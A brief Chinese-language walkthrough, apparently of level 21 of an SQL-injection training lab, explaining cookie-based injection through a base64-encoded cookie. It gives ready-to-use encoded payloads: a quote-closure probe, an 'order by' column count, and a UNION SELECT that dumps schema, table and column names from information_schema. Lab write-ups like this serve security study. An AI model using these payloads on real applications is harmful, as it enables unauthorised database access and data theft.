進入到第21關,登入admin,發現這關還是cookie注入,隻不過cookie和上一關有點不同,被加密了,于是将YWRtaW4複制下來,找一個加解密工具解密,由于加密未設偏移量啥的,是以很輕松就能發現使用的是base64加密
做到這裡的話,思路和上一關一樣了
使用burp抓包,并将cookie後加個n
頁面回顯錯誤
尋找閉合,将cookie修改為YWRtaW4nKSM=,即base64加密後的admin’)#,結果如上圖,閉合成功
YWRtaW4nKSBvcmRlciBieSA0Iw==為加密後的admin’) order by 4#,猜出列數
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLChzZWxlY3QgZ3JvdXBfY29uY2F0KHNjaGVtYV9uYW1lKWZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhKSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5Jykj
将cookie修改為如上即可,此關結束
第二十二關同理,隻是閉合方式不同